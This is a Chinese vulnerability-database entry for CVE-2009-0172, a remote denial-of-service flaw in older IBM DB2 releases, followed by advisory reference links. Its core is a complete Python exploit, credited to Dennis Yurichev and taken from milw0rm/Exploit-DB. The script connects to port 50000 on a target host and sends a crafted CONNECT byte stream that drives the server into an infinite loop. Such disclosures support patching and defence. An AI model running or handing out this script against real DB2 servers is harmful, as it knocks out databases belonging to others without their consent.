IBM DB2 远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117550 漏洞类型 输入验证
发布时间 2009-04-03 更新时间 2009-06-05
CVE编号 CVE-2009-0172 CNNVD-ID CNNVD-200901-214
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8344
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-214
|漏洞详情
IBMDB2修复补丁17a之前的8版本,修复补丁6a之前的9.1版本以及修复补丁3a之前的9.5版本中存在未明漏洞。远程攻击者可以借助一个特制的CONNECT数据流,引起拒绝服务攻击(死循环)。
|漏洞EXP
# Discovered by Dennis Yurichev <dennis@conus.info>

# DB2TEST database should be present on target system

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 50000))

sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43")

sockobj.close()

# milw0rm.com [2009-04-03]
|参考资料

来源:BID
名称:33258
链接:http://www.securityfocus.com/bid/33258
来源:www-01.ibm.com
链接:http://www-01.ibm.com/support/docview.wss?uid=swg21363936
来源:XF
名称:ibm-db2-connect-stream-dos(47931)
链接:http://xforce.iss.net/xforce/xfdb/47931
来源:VUPEN
名称:ADV-2009-0137
链接:http://www.frsirt.com/english/advisories/2009/0137
来源:AIXAPAR
名称:IZ37696
链接:http://www-01.ibm.com/support/docview.wss?uid=swg1IZ37696
来源:SECTRACK
名称:1021591
链接:http://securitytracker.com/id?1021591
来源:SECUNIA
名称:33529
链接:http://secunia.com/advisories/33529
来源:ftp.software.ibm.com
链接:ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/aparlist/db2_v95/APARLIST.TXT
来源:ftp.software.ibm.com
链接:ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/aparlist/db2_v91/APARLIST.TXT
来源:ftp.software.ibm.com
链接:ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/aparlist/db2_v82/APARLIST.TXT